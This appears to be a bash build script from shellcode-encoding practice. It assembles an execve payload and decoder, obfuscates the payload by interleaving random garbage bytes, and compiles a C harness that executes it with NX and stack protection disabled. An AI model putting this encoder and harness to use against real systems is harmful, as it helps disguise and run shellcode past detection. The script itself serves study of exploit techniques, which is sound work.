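#!/usr/bin/env bash
#
# Build a test harness around the encoded execve-stack payload:
#   1. assemble and link the payload and the decoder stubs (nasm + ld)
#   2. extract the decoder's opcode bytes as a C "\x.." string
#   3. interleave every payload byte with a randomly chosen garbage byte
#      (the "permutation" encoding) and close the stream with \xAF
#   4. write shellcode.c around the combined string and compile it
#
# Requires: nasm, ld (binutils), objdump, od, gcc with 32-bit support.
# Inputs:   execve-stack.nasm and decoder.nasm in the current directory
#           (the paths can be overridden through SPAYLOAD / SDECODER).
# Outputs:  shellcode.c and the ./shellcode binary; intermediate ELF
#           objects are removed at the end.
#
# The script uses bash-only features (arrays, arithmetic subscripts), so the
# shebang is bash rather than sh: under dash the array assignment below is a
# syntax error.
set -eu

die() { printf '%s\n' "$*" >&2; exit 1; }

#######################################
# Print the opcode bytes of a linked ELF as a "\xNN\xNN..." string (no
# surrounding quotes, no trailing newline).
# Relies on objdump's text layout: every instruction line and every
# continuation line of a long instruction starts with a space, and its
# second tab-separated field is the space-separated hex byte list.
# Arguments: $1 - path to the binary
# Outputs:   escaped bytes on stdout
#######################################
opcode_bytes() {
  local bin=$1 byte
  # shellcheck disable=SC2046 -- word-splitting the hex byte list is intended
  for byte in $(objdump -d -M intel "$bin" | grep '^ ' | cut -f2); do
    printf '\\x%s' "$byte"
  done
}

#
# Compile the payload and decoder
#
echo " [+] Compiling the payload and decoder ..."

SPAYLOAD=${SPAYLOAD:-./execve-stack}
SDECODER=${SDECODER:-./decoder}

# Each stage is checked on its own: with the original `nasm ... && ld ...`
# list a nasm failure was not fatal under set -e and the run carried on to
# objdump against a binary that was never produced.
nasm -f elf32 -o "$SPAYLOAD.o" "$SPAYLOAD.nasm" || die " [-] nasm failed on $SPAYLOAD.nasm"
ld -m elf_i386 -o "$SPAYLOAD" "$SPAYLOAD.o" || die " [-] ld failed on $SPAYLOAD.o"
nasm -f elf32 -o "$SDECODER.o" "$SDECODER.nasm" || die " [-] nasm failed on $SDECODER.nasm"
ld -m elf_i386 -o "$SDECODER" "$SDECODER.o" || die " [-] ld failed on $SDECODER.o"

echo " [+] Preparing decoder shellcode ..."
# Opens the C string literal; the encoded payload closes it.
DECODERSHELLCODE="\"$(opcode_bytes "$SDECODER")"

#
# Encode the payload shellcode
#
echo " [+] Encoding the payload shellcode ..."
#
# $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 -
# 00000000 37 aaa
# 00000001 FA cli
# 00000002 D6 salc
# 00000003 3F aas
#
# Permutation code: after every payload byte one of these four garbage bytes
# is inserted, picked with two bytes from /dev/urandom (od prints them as a
# single unsigned 16-bit value) reduced modulo 4.
garbage=('\x37' '\xFA' '\xD6' '\x3F')

#######################################
# Interleave the payload's opcode bytes with garbage bytes and terminate
# the stream with \xAF followed by the closing C quote.
# Globals:   garbage (read)
# Arguments: $1 - path to the payload binary
# Outputs:   encoded bytes on stdout, ending in \xAF"
#######################################
encode_payload() {
  local bin=$1 byte pick
  # shellcheck disable=SC2046 -- word-splitting the hex byte list is intended
  for byte in $(objdump -d -M intel "$bin" | grep '^ ' | cut -f2); do
    pick=$(( $(od -A n -N 2 -t u2 /dev/urandom) % 4 ))
    printf '\\x%s%s' "$byte" "${garbage[pick]}"
  done
  # NOTE(review): \xAF marks the end of the encoded stream; if decoder.nasm
  # (not part of this file) scans for it as the terminator, the raw payload
  # must not itself contain 0xAF — confirm against the decoder source.
  printf '\\xAF"'
}
ENCPSHELLCODE=$(encode_payload "$SPAYLOAD")

FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}

#
# Generate shellcode.c
#
echo " [+] Generating shellcode.c file ..."
# Unquoted heredoc: $FULL_SHELLCODE expands to the complete C string literal,
# opening and closing quotes included, so it is placed directly on the
# declaration line (the original relied on a backslash-newline continuation
# inside the heredoc to achieve the same join).
# main() had an implicit int return type, which GCC 14 rejects by default,
# and %d with a size_t argument is a mismatched format; both are fixed.
# strlen() stops at the first NUL, so the printed length is only meaningful
# for NUL-free shellcode.
cat > shellcode.c << EOF
#include <stdio.h>
#include <string.h>

unsigned char code[] = $FULL_SHELLCODE;

int main(void)
{
    printf("Shellcode Length: %zu\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
EOF

#
# Compile C code with GCC
#
echo " [+] Compiling shellcode.c with GCC ..."
# -z execstack and -fno-stack-protector switch off NX and stack canaries for
# this test binary only: it jumps into a writable data array, which is
# exactly what those mitigations exist to block.
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode || die " [-] gcc failed"

ls -la ./shellcode

#
# Cleanup
#
# SPAYLOAD/SDECODER already carry their ./ prefix (the original prepended a
# second one); -f keeps cleanup best-effort if a stage was skipped.
rm -f -- "$SPAYLOAD" "$SDECODER" "$SPAYLOAD.o" "$SDECODER.o"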